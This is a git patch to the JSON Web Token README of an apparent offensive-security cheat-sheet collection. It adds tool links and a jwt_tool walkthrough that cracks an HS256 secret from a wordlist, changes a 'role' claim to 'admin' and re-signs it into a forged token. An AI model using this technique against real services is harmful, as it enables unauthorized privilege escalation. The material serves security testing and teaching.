From 9d1ebbacdb7362e349dd068bd076c3e36c3555ef Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 10 Mar 2019 13:33:50 +0100 Subject: [PATCH] JSON Web Token - jwt_tool example --- JSON Web Token/README.md | 69 ++++++++++++++++++++++++++++++++++++++-- 1 file changed, 66 insertions(+), 3 deletions(-) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index 00a6ce0..6a89ce3 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -9,6 +9,11 @@ - JWT Signature - RS256 to HS256 - Breaking JWT's secret +## Tools + +- [jwt_tool](https://github.com/ticarpi/jwt_tool) +- [c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker) + ## JWT Format JSON Web Token : `Base64(Header).Base64(Data).Base64(Signature)` @@ -133,9 +138,66 @@ jwt.decode(encoded, 'Sn1f', algorithms=['HS256']) # decode with 'Sn1f' as the se ### JWT tool -```bash +First, bruteforce the "secret" key used to compute the signature. + +```powershell git clone https://github.com/ticarpi/jwt_tool -python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw /usr/share/wordlists/rockyou.txt +python2.7 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI /tmp/wordlist + +Token header values: +[+] alg = HS256 +[+] typ = JWT + +Token payload values: +[+] sub = 1234567890 +[+] role = user +[+] iat = 1516239022 + +File loaded: /tmp/wordlist +Testing 5 passwords... +[+] secret is the CORRECT key! +``` + +Then edit the field inside the JSON Web Token. + +```powershell +Current value of role is: user +Please enter new value and hit ENTER +> admin +[1] sub = 1234567890 +[2] role = admin +[3] iat = 1516239022 +[0] Continue to next step + +Please select a field number: +(or 0 to Continue) +> 0 +``` + +Finally, finish the token by signing it with the previously retrieved "secret" key. + +```powershell +Token Signing: +[1] Sign token with known key +[2] Strip signature from token vulnerable to CVE-2015-2951 +[3] Sign with Public Key bypass vulnerability +[4] Sign token with key file + +Please select an option from above (1-4): +> 1 + +Please enter the known key: +> secret + +Please enter the keylength: +[1] HMAC-SHA256 +[2] HMAC-SHA384 +[3] HMAC-SHA512 +> 1 + +Your new forged token: +[+] URL safe: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.xbUXlOQClkhXEreWmB3da_xtBsT0Kjw7truyhDwF5Ic +[+] Standard: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.xbUXlOQClkhXEreWmB3da/xtBsT0Kjw7truyhDwF5Ic ``` ### JWT cracker @@ -164,4 +226,5 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret - [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) - [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/) - [Critical vulnerabilities in JSON Web Token libraries - March 31, 2015 - Tim McLean](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//) -- [Learn how to use JSON Web Tokens (JWT) for Authentication - @dwylhq](https://github.com/dwyl/learn-json-web-tokens) \ No newline at end of file +- [Learn how to use JSON Web Tokens (JWT) for Authentication - @dwylhq](https://github.com/dwyl/learn-json-web-tokens) +- [Simple JWT hacking - @b1ack_h00d](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750) \ No newline at end of file